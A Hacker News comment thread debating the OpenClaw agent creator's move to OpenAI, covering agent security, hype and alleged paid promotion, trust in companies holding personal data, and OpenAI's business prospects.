I don't believe skimming diffs counts as being left behind. Survivor bias etc. Furthermore, people are going to get burned by this (already have been, but seemingly not enough) and a responsible mindset such as yours will be valued again.
Something that still up for grabs is figuring how how to do full agenetic in a responsible way. How do we bring the equivalent of skimming diffs to this?
i think the silver lining is that AI seems to be genuinely good at finding security issues and maybe further down the line enough to rely on it somewhat. the middle period we're entering right now is super scary.
we want all the value, security be damned, and have no way to know about issues we're introducing at this breakneck speed.
still i'm hopeful we can figure it out somehow
and this is why they bought Peter. i’m betting he will come to regret it.
A security hole in a browser is an expected invariant not being upheld, like a vulnerability letting a remote attacker control your other programs, but it isn't a bug when a user falls for an online scam. What invariants are expected by anyone of "YOLO hey computer run my life for me thx"?
Nothing actually bad happened in this case and probably never will. Maybe some people have their crypto or identity stolen, but probably not a rate rate significantly higher than background (lots of people are using openclaw)
https://www.shodan.io/search?query=http.favicon.hash%3A-8055...
Indeed they are, at least 20,432 people :)
So don’t feel bad. Everything on the internet is fake.
For less than the cost of 1 graphics card you can get enough people going that the rest of them will hop on board for free just to try and ride the wave.
Add a little LLM generated comments that might not throw the product in your face but make sure it is always part of the conversation so someone else can do it for you for free and you are off to the races.
I will say openly: I don't get it and I used to argue for crypto use cases.
Making users happy > perfect security day one
Erm, is this some groundbreaking revelation?
Its always been that way. Unless its in the context of superior technology with minimal UI a-la Google Search in its early years.
Unfortunately, you just have to understand that this happens all over the place, and all you can really do is try to make your corner of the world a little better. We can’t make programmers use good security practices. We can’t make users demand secure software. We can at least try to do a better job with our own work, and educate people on why they should care.
But one thing to remember - our job is to figure out how to enable these amazing usecases while keeping the blast radius as low as possible.
Yes, OpenClaw ignores all security norms, but it's our job to figure out an architecture in which agents like these can have the autonomy they need to act, without harming the business too much.
So I would disagree our work is "on the way out", it's more valuable than ever. I feel blessed to be working in security in this era - there has never been a better time to be in security. Every business needs us to get these things working safely, lest they fall behind.
It's fulfilling work, because we are no longer a cost center. And these businesses are willing to pay - truly life changing money for security engineers in our niche.
> What I want is to change the world, not build a large company and teaming up with OpenAI is the fastest way to bring this to everyone.
do no not make me feel all warm and fuzzy: Yeah, changing the world with Tiel's money. Try joining a union instead.
Ever since I was four, I've dreamed of doing my part to bring that about.
Whatever the origins of the term, it now seems clear it’s kind of the direction things are going.
Throughout the conversation he speculated on some truly bizarre possible futures, including an oligarchic takeover by billionaires with private armies following the collapse of the USA under Trump. What weirded me out was how oddly specific he got about all the possible futures he was speculating about that all ended with Thiel, Musk, and friends as feudal lords. Either he thinks about it a lot, or he overhears this kind of thing at the ultracapitalist soirées he's been going to.
Guess I’ll have to get a Samurai sword soon and pivot to high stakes pizza delivery.
There are a disturbing amount of parallels between Elon and L Bob Rife.
It’s really disturbing that we have oligarchs trying to eagerly create a cyberpunk dystopia.
OpenAI has tried a lot of experiments over the years - custom GPTs, the Orion browser, Codex, the Sora "TikTok but AI" app, and all have either been uninspired or more-or-less clones of other products (like Codex as a response to Claude Code).
OpenClaw feels compelling, fresh, sci-fi, and potentially a genuinely useful product once matured.
More to the point, OpenAI needs _some_ kind of hyper-compelling product to justify its insane hype, valuation, and investments, and Peter's work with OpenClaw seems very promising.
(All of this is complete speculation on my part. No insider knowledge or domain expertise here.)
Like, why doesn’t OpenAI build tax filing into ChatGPT? That’s like the immediate use case for LLM-based app development.
Legal liability.
Atlas is OpenAIs browser
This product should never have seen the light of day, at least not for the general public. The amount of slop that is now floating across Tiktok, YT Shorts and Instagram is insane. Whenever you see a "cute animals" video, 99% of it is AI generated - and you can report and report and report these channels over and over, and the platforms don't care at all, but instead reward the slop creators from all the comments shouting that this is AI garbage and people responding they don't care because "it's cute".
OpenAI completely lacks any sort of ethical review board, and now we're all suffering from it.
And most people I know who love spending time on this kind of content would not care either - because they don't care whether they waste time on real or AI animal videos. They just want something to waste time with.
Yes indeed. I do love me some cat and bunny videos. But I hate getting fed slop - and it's not just cat videos by the way. I'm (as evidenced by my comment history) into mechanics, electronics and radio stuff, and there are so damn many slop channels spreading outright BS with AI hallucinated scripts that it eventually gets really really annoying. Sadly, YT's algorithm keeps feeding me slop in every topic that interests me and frankly it's enraging, as some of my favorite legitimate creators like shorts as a format so I don't want to completely hide shorts.
> And most people I know who love spending time on this kind of content would not care either - because they don't care whether they waste time on real or AI animal videos. They just want something to waste time with.
The problem is, these channels build up insane amounts of followers. And it would not be the first time that these channels then suddenly pivot (or get sold from one scam crew to the next) and spread disinformation, crypto scams and other fraud - it was and is a hot issue on many social media platforms.
Of course the S in openclaw is for security.
It has been interesting to watch this take off. It wasn't the first or even best agent framework and it deliberately avoided all of the hard problems that others were trying to solve, like security.
What it did have was unnatural levels of hype and PR. A lot of that PR, ironically, came from all of the things that were happening because it had so many problems with security and so many examples of bad behavior. The chaos and lack of guardrails made it successful.
Seriously, I just don't understand what's going on. To me it looks like all world just has gone crazy.
Reminds me of 30 years ago.
The feature set is pretty simple:
- Agents that can write their own tools.
- Agents that can write their own skills.
- Agents that can chat via standard chat apps.
- Agents that can install and use cli software.
- Agents that can have a bit of state on disk.
Yet I’ve known many people who have said it is difficult to use; this was a 0.01-0.1% adoption tool. There is still a huge ease of use gap to cross to make it adopted in 10-50% of computer users.
do you think the agent admin ui mattered at all?
other contributors while i think of them:
- good timing around opus 4.6 as the default model? (i know he used codex, but willing ot bet majority of openclaws are opuses)
- make immediate wins for nontechnical users. everyone else was busy chasing cursor/cognition or building horiztonal stuff like turbopuffer or whatever. this one was straight up "hook up a good bot to telegram"
- theres many attempts at "personal OS", "assistant", but no good ones open source? a lot of sketchier china ones, this was the first western one
There are very few companies who I trust with my digital data and thus trust to host something like OpenClaw and run it on my behalf: American Express, Capital One, maybe Proton, and *maybe* Apple. I managed an AI lab team at Capital One and personally I trust them.
I am for local compute, private data, etc., but for my personal AI assistant I want something so bullet proof that I lose not a minute of sleep worrying about by data. I don't want to run the infrastructure myself, but a hybrid solution would also be good.
A company like AMD I would trust more than a company like Apple.
I honestly can’t name a single one I know of who could pass that criteria
Edit:found your other comment answering a similar question
SECURITY
PRIVACY
---
Heyyy it never said "good privacy" perceive as you want...
Don't publicly acknowledge that you were the reason someone got murdered and 1000 VIPs got hacked.
One day when I'm deemed a 'Baddie', I looked at Apple as inspiration.
So that rules out Apple.
A leadership team that is very open and involved with the community, and one that takes extra steps, compared to competitors, to show they take privacy seriously.
and make sure the member/owners are all of like mind, and willing to pay more to ensure security and privacy
I had assumed I'd have to lean more on the capitalistic values of being a co-op, like better rates for our clients, higher quality work, larger likelihood of our long term existence to support our work, more project ownership, so as to make the pitch palatable to clients. Turns out clients like the soft pitch too, of just workers owning the company they work within - I've had several clients make contact initially because they bought the vision over the sales pitch.
I'm trying to think about if I'd trust us more to set up or host openclaw than a VC funded startup or an establishment like Capital One. I think both alternatives would have way more resources at hand, but I'm not sure how that would help outside of hiring pentesters or security researchers. Our model would probably be something FOSS that is keyed per-user, so if we were popular, imo that would be more secure in the end.
The incentives leading to trust is definitely in a co-op's favor, since profit motive isn't our primary incentive - the growth of our members is, which isn't accomplished only through increasing the valuation of the co-op. Members also have total say in how we operate, including veto power, at every level of seniority, so if we started doing something naughty with customer data, someone else in the org could make us stop.
This is our co-op: 508.dev, but I've met a lot of others in the software space since founding it. I think co-ops in general have legs, the only problem is that it's basically impossible to fund them in a way a VC is happy with, so our only capitalization option is loans. So far that hasn't mattered, and that aligns with the goal of sustainable growth anyway.
Yes, agreed for the USA/Taiwan/Japan where we mostly operate. For us it's been understanding and leveraging the alternative resources we have. Like, we have a lot of members, but really only a couple are bringing in customers, despite plenty of members having very good networks.
Is your current a co-op? 200+ sales at 30k a pop seems to be pretty well off the ground!
Exactly what I said. We need lower shareholder interference not more, and in co-operative it's the opposite.
> with immediate liability for their person.
What do you mean?
If, as a shareholder operator, a co-op member pressured themselves to exploit user data to turn a quick buck, I guess that's possible, but likely they'd be vetoed by other members who would get sucked into the shitstorm.
In my experience, co-op members and customers are more value-oriented than profit-motivated, within reason.
Effectively you can trust all of the companies out there right up until they are acquired and then you will regret all of the data you ever gave them. In that sense Facebook is unique: it was rotten from day #1.
Vehicles: anything made before 2005, SIM or e-SIM on board = no go.
I'm halfway towards setting up my own private mail server and IRC server for me and my friends and kissing the internet goodbye. It was a fun 30 years but we're well into nightmare territory now. Unfortunately you are now more or less forced to participate because your bank, your government and your social circle will push you back in. And I'm still pissed off that I'm not allowed to host any servers on a residential connection. That's not 'internet connectivity' that's 'consumer connectivity'.
Every day my doomer sentiment deepens, and I am ashamed when I come onto here and see all this optimism. It is refreshing to see people whose opinions I have come to respect on this forum to be as negative as I am.
Such as?
These aloof comments that talk about something we're supposed to know about without referencing anything are very unhelpful.
It's a pity, they were doing well for a long time.
I'm surprised that someone on HN would paint all of HN with the same brush.
It's one of those 'lesser evils' things. If you know of a better email provider I'd love to know.
( https://www.lemonade.com/fsd is an example )
You only get offered a discount if most other customers are being compelled to pay full (or even increased) prices for the same offering. Otherwise revenue goes down and company leadership finds itself finding other ways to cut costs and increase profits.
After reading Jacques's response to my question, my list got smaller. Personally, I still like Proton, but I get that they have made some people unhappy. I also agree that Hetzner is a reliable provider; I have used them a bunch of times in the last ten years.
Then my friend, we have to worry about fiber/network providers I suppose.
This general topic is outside my primary area of competence, so I just have a loose opinion of maintaining my own domain, use encryption, and being able switch between providers easily.
I would love to see an Ask HN on secure and private agentic infra + frameworks.
I don't really understand what this has to do with the post or even OpenClaw. The big draw of OpenClaw (as I understand it) was that you could run it locally on your own system. Supposedly, per this post, OpenClaw is moving to a foundation and they've committed to letting the author continue working on it while on the OpenAI payroll. I doubt that, but it's a sign that they're making it explicitly not an OpenAI product.
OpenClaw's success and resulting PR hype explosion came from ignoring all of the trust and security guardrails that any big company would have to abide by. It would be a disaster of the highest order if it had been associated with any big company from the start. Because it felt like a grassroots experiment all of the extreme security problems were shifted to the users' responsibility.
It's going to be interesting to see where it goes from here. This blog post is already hinting that they're putting OpenClaw at arm's length by putting it into a foundation.
With any luck, maybe this will finally be a bridge too fast, like what Amazon's superbowl ad did for surveillance conversation.
My trust does not extend that far.
Lol
Their marketing team got ya.
I aspire to be as good as Apple at marketing. Who knew 2nd or worse place in everything doesnt matter when you are #1 in marketing?
It took all of Peter’s time to move it forward, even with maintainers (who he complained got immediately hired by AI companies).
Now he’s gonna be working on other stuff at OpenAI, so OpenClaw will be dead real quick.
Also I was following him for his AI coding experience even before the whole OpenClaw thing, he’ll likely stop posting about his experiences working with AI as well
As per the new terms of service, the ads are already in
My guess if this guy has taken a job for maybe $1M, effectively handing over the crown jewels to Altman for nothing.
OpenAI must be laughing their heads off.
Beads and blankets.
MongoDB – ~30 B USD
Docker – Private (~2+ B USD last valuation)
Redis Ltd. – Private (~2 B USD last valuation)
Grafana Labs – Private (~6 B USD last valuation)
Confluent (Apache Kafka) – ~11 B USD
Cloudera (Apache Hadoop) – 5.3 B USD (acquired)
SUSE Linux – ~2.5 B USD
Red Hat – 34 B USD (acquired)
HashiCorp – 6.4 B USD (acquired)
lol. what?
OpenAI has two real competitors: Anthropic in the enterprise space and Google in the consumer space. Google fell far behind early on and ceded a lot of important market share to ChatGPT. They're catching up, but the runaway success of ChatGPT provides OpenAI with a huge runway among consumers.
In the enterprise space, OpenAI's partnership with Microsoft has been a gold mine. Every company on the planet has a deep relationship with Microsoft, so being able to say "hey just add this to your Microsoft plan" has been huge for OpenAI.
The thing about enterprise is the stakes are high. Every time OpenAI signals that they're not taking AI safety seriously, Anthropic pops another bottle of champagne. This is one of those moments.
Again, I doubt it matters much either way, but if OpenAI does end up blowing up, decisions like this will be in the large pile of reasons why.
Claiming Dario is the bad guy in any context is kind of a tough characterization to agree with, if even a fraction of one interview with him has been seen.
To stay on point though: OpenAI hiring OpenClaw creator does seem to lean away from a serious enterprise benefit and towards a more consumer-based tack, which is a curious business move considering the original comments perspective of OpenAI.
I don't know if you'll achieve that at OpenAI or if it'll even be a good change for the world, but I genuinely wish you the best. Regardless of the news around OpenAI I still think it's great that a personal project got you a position at a company like that.
Sounds like a threat - "I'm joining OpenSkynetAI to bring AI agents onto your harddisc too!"
Add in databases, browser use, and the answer could be yes
This could be the most disruptive software we have seen
Are you making anyone's life better? Who will even pay you once most jobs are automated?
At best, it's a defensive move: make money, get hard capital and seek rent after most of society has collapsed?
Deindustrialization happened 20-40 years ago and the affected regions are still hit hard.
Also, you're making my point. Utterly heartless.
In the past, people wanting to sign a juicy contract at a FAANG were told to spend hours everyday on Leetcode.
Now? Just spend tokens until you build something that get enough traction to be seen by one of the big labs!
Its just happened that this one latched on a trend well and went viral, cease and desist from its name accelerated the virality
Regarding openclaw's hype, it is not about how you access it, but rather what the agents can access from you, and no one did that before. Probably because no one had the balls to put in the wild such unsecure piece of software
Anyone working for OpenAI is complicit with these abuses. I hope that in due time having OpenAI on your resume will be a strong negative signal.
We can assume first that at OpenAI he's going to build the hosted safe version that, as he puts it, his mum can use. Inevitably at some point he and colleagues at OpenAI will discover something that makes the agent much more effective.
Does that insight make it into the open version? Or stay exclusive to OAI?
(I imagine there are precedents for either route.)
The cry has been for a while that LLMs need more data to scale.
The new Open(AI)Claw could be cheap or free, as long as you tick the box that allows them to train on your entire inbox and all your documents.
This isn't a Slay The Spire reference is it?
OpenAI is putting money where their mouth is: a one-man team can create a vibe-coded project, and score big.
Open-source, and hyped incredibly well.
Interesting times ahead as everyone else chases this new get-rich-quick scheme. Will be plentiful for the shovel makers.
Peter single handedly got many of us taking Codex more seriously, at least that's my impression from the conversations I had. Openclaw has gotten more attention over the past 2 weeks than anything else I can think of.
Depending on how this goes, this could be to OpenAI what Instagram was to Facebook. FB bought Instagram for $1 billion and now estimated to be worth 100's of billies.
Total speculation based on just about zero information. :)
Comments like this feel confusing because I didn't have any association between Codex and OpenClaw before reading your comment.
Codex was also seeing a lot of usage before OpenClaw.
The whole OpenClaw hype bubble feels like there's a world of social media that I wasn't tapped into last month that OpenClaw capitalized on with unparalleled precision. There are many other agent frameworks out there, but OpenClaw hit all the right notes to trigger the hype machine in a way that others did not. Now OpenClaw and its author are being attributed for so many other things that it's hard for me to understand how this one person inserted himself into the center of this media zeitgeist
I’m questioning how some people in that bubble came to believe he was at the center of that universe. He wasn’t the only person talking about the differences between Codex or Claude. Most of the LLM people I follow had their own thoughts and preferences that they advertised too.
If openai had done it themselves, immediate backlash.
OpenClaw and Claude Code aren't solving the same problems. OpenClaw was about having a sandbox, connecting it to a messenger channel, and letting it run wild with tools you gave it.
People would wake up to their agent having built something cool the night before or automate their workflow without even asking for it.
OpenClaw was about having the agent operate autonomously, including initiating its own actions and deciding what to do. Claude Code was about waiting for instructions and presenting results.
“Just SSH into Claude Code” is like the famous HN comment that didn’t understand why anyone was interested in DropBox because you could do backups with shell scripts.
There is not much novel about OpenClaw. Anybody could have thought of this or done it. The reason people have not released an agent that would run by itself, edit its own code and be exposed to the internet is not that it's hard or novel - it's because it is an utterly reckless thing to do. No responsible corporate entity could afford to do it. So we needed someone with little enough to lose, enough skill and willing to be reckless enough to do it and release it openly to let everyone else absorb the risk.
I think he's smart to jump on the job opportunity here because it may well turn out that this goes south in a big way very fast.
To be fair, when used in retrospect, this applies to just about any big tech company
Bringing unblockable ads to the masses. Roger that.
This is an app that would've normally had a dozen or so people behind it, all acquihired by OpenAI to find the people who really drove the project.
With AI, it's one person who builds and takes everything.
Acquihires haven't worked that way for a while. The new acquihire game is to buy out a few key execs and then have them recruit away the key developers, leaving the former company as a shell for someone else to take over and try to run.
Also OpenClaw was not a one-person operation. It had several maintainers working together.
https://web.archive.org/web/20260215220749/https://steipete....
The sandboxing part matters more than people think. Giving an LLM a browser with full network access and no isolation is a real security problem that most projects in this space hand-wave away.
Multi-provider LLM support (OpenAI, Anthropic, DeepSeek, open-weight models via vLLM). In production with paying customers.
Happy to answer architecture questions.
The guy is creative, but this is really just following the well known pattern of acquiring/hiring bright minds if only to prevent your competition from doing the same.
Big Tech can't release software this dangerous and then figure out how to make it secure. For them it would be an absolute disaster and could ruin them.
What OpenClaw did was show us the future, give us a taste of what it would be like and had the balls to do it badly.
Technology is often pushed forwards by ostensively bad ideas (like telnet) that carve a path through the jungle and let other people create roads after.
I don't get the hate towards OpenClaw, if it was a consumer product I would, but for hackers to play around to see what is possible it's an amazing (and ridiculously simple) idea. Much like http was.
If you connected to your bank account via telnet in the 1980s or plain http in the 90s or stored your secrets in 'crypt' well, you deserved what you got ;-) But that's how many great things get started, badly, we see the flaws fix them and we get the safe version.
And that I guess is what he'll get to do now.
* OpenClaw is a straw man for AGI *
The real gem inside OpenClaw is pi, the agent, created by Mario Zechner. Pi is by far the best agent framework in the world. Most extensible, with the best primitives. .
Armin Ronacher , creator of flask , can go deep and make something like openclaw enterprise ready.
The value of Peter is in connecting the dots, thinking from users perspective, and bringing business perspective
The trio are friends and have together vibecoded vibetunnel.
Sam Altman, if you are reading this , get Mario and Armin today.
Personally I'm excited to see what he can do with more resources, OpenClaw clearly has a lot of potential but also a lot of improvements needed for his mum to use it.
You work for OpenAI now. You don't have to worry about safety anymore.
The creator built a powerful social media following and capitalized on that. Fair play.
No company could ship anything like OpenClaw as a product because it was a million footguns packaged with a self-installer and a couple warnings that it can't be trusted for anything.
There's a reason they're already distancing themselves from it and saying it's going to an external foundation
In spite of that, it’s incredibly obvious OpenClaw was pushed by bots across pretty much every social media platform and that’s weird and unsettling.
Honestly, Anthropic really dropped the ball here. They could have had such an easy integration and gained invaluable research data on how people actually want to use AI — testing workflows, real-world use cases, etc. Instead, OpenAI swoops in and gets all of that. Massive missed opportunity.
money or morals, choose one
Please dispense with the “change the world” bullshit.
I understand that it’s healthy to celebrate your personal victories but in this context with this bro going to OpenAI to make 7 figures, maaaan I don’t think this guy needs our clicks.
On top of that there’s a better than 50% chance OpenAI suffocates the open source project and the alternative will be a paid privacy nightmare.
The future is both amazing and shitty.
Hope OpenClaw continues to evolve. It is indeed an amazing piece of work.
And I hope sama doesn't get his grubby greedy hands on OpenClaw.
Once my Olares One is here, will also be using local LLMs on open models.
I'm assuming there's a typo here, because I can't imagine a flight from LAX to SKO at all, let alone one that goes anywhere close to Honolulu. But I can't figure out what this was supposed to be.
Props to this guy for scamming Altman this hard without writing a single line of code, or really doing anything at all other than paying for a bunch of github stars and tweets/blogposts from fellow grifters.
Thank you, we already fucked. I am a hypocrite of course.
This is a vibe coded agent that is replicable in little time. There is no value in the technology itself. There is value in the idea of personal agents, but this idea is not new.
The value is in the hype, from the perspective of OpenAI. I believe they are wrong (see next points)
We will see a proliferation of personal agents. For a short time, the money will be in the API usage, since those agents burn a lot of tokens often for results that can be more sharply obtained without a generic assistant. At the current stage, not well orchestrated and directed, not prompted/steered, they are achieving results by brute force.
Who will create the LLM that is better at following instructions in a sensible way, and at coordinating long running tasks, will have the greatest benefit, regardless of the fact the OpenClaw is under the umbrella of OpenAI or not.
Claude Opus right now is the agent that works better for this use case. It is likely that this will help Anthropic more than OpenAI. It is wise, for Anthropic, to avoid burning money for an easily replicable piece of software.
Those hypes are forgotten as fast as they are created. Remember Cursor? And it was much more a true product than OpenClaw.
Soon, personal agents will be one of the fundamental products of AI vendors, integrated in your phone, nothing to install, part of the subscription. All this will be irrelevant.
In the mean time, good for the guy that extracted money from this gold mine. He looks like a nice person. If you are reading this: congrats!
(throw away account of obvious reasons)
of course--i use it every day. are you implying Cursor is dead? they raised $2B in funding 3 months ago and are at $1B in ARR...
But base vs code is fine for that too
Who?
> are you implying Cursor is dead? they raised $2B in funding 3 months ago and are at $1B in ARR
That is the problem. It doesn't matter about how much they raised. That $2B and that $1B is paying the supplier Anthropic and OpenAI who are both directly competing against them.
Cursor is operating on thin margins and still continues to losing money. It's now worse that people are leaving Cursor for Claude Code.
In short, Cursor is in trouble and they are funding their own funeral.
Whoever stands in front of the customer ultimately wins. The rest are just cost centers.
This fucking guy will fit right in at OpenAI.
Good for him, but no particular geniusness.
The reason is that he paid every AI "influencer" to promote it. Within the span of a week, the project went from being completely unknown to every single techbro jumping on it as the next "thing that will change the world". It also gained around 70k github stars in that time.
In the age of AI, everything is fake.
We're working on security and about 3 very key architectural improvements.
We detached this subthread from https://news.ycombinator.com/item?id=47028331.
Please don't create accounts to break HN's rules with.
https://news.ycombinator.com/newsguidelines.html
Edit: since this account has been posting almost exclusively flamebait and ideological/political battle comments, I've banned it. Please don't create accounts to break HN's rules with—it will eventually get your main account banned as well.
Related, this persons entire post history is full of weird hate rhetorics. Why allow them to continue having comment privileges on the site? It seems all they do is provoke.
Edit: picture is from a Vienna meet up. Not OpenAI.
There is literally no need to shit on ur mom like that. Sorry your mom sucks at tech but can we please stop using this as a euphemism?
AFAIK Anthropic won't let projects use the Claude Code subscription feature, but actually push those projects to the Claude Code API instead.
What’s fascinating is the pattern we’re seeing lately: people who explored the frontier from the outside now moving inside the labs. That kind of permeability between open experimentation and foundational model companies seems healthy.
Curious how this changes the feedback loop. Does bringing that mindset in accelerate alignment between tooling and model capabilities — or does it inevitably centralize more innovation inside the labs?
Either way, congrats. The ecosystem benefits when strong builders move closer to the core.
I would expect someone who "strikes gold" like this in a solo endeaver to raise money, start a company, hire a team. Then they have to solve the always challenging problem of how to monetize an open-source tool. Look at a company like Docker, they've been successful but they didn't capture more than a small fraction of the commercial revenue that the entire industry has paid to host the product they developed and maintain. Their peak valuation was over a billion dollars, but who knows by the time all is said and done what they'll be worth when they sell or IPO.
So if you invent something that is transformative to the industry you might work really hard for a decade and if you're lucky the company is worth $500M, if you can hang onto 20% of the company maybe it's worth $100M.
Or, you skip the decade in the trenches and get acqui-hired by a frontier lab who allegedly give out $100M signing bonuses to top talent. No idea if he got a comparable offer to a top researcher, but it wouldn't be unreasonable. Even a $10M package to skip a decade of risky & grueling work if all you really want to do is see the product succeed is a great trade.
The deeper issue is that agent frameworks run straight into formal limits (Gödel/Turing-style): once planning and execution are non-deterministic, you lose reproducibility, auditability, and guarantees. You can wrap that with guardrails, but you can’t eliminate it. That’s why these tools demo well but don’t become foundations. Serious systems still keep LLMs at the edges and deterministic machinery in the core.
Meta: this comment itself was drafted with ChatGPT’s help — which actually reinforces the point. The model didn’t decide the thesis or act autonomously; a human constrained it, evaluated it, and took responsibility. LLMs add real value as assistive tools inside a deterministic envelope. Remove the human, and you get the exact failure modes people keep rediscovering in agent frameworks.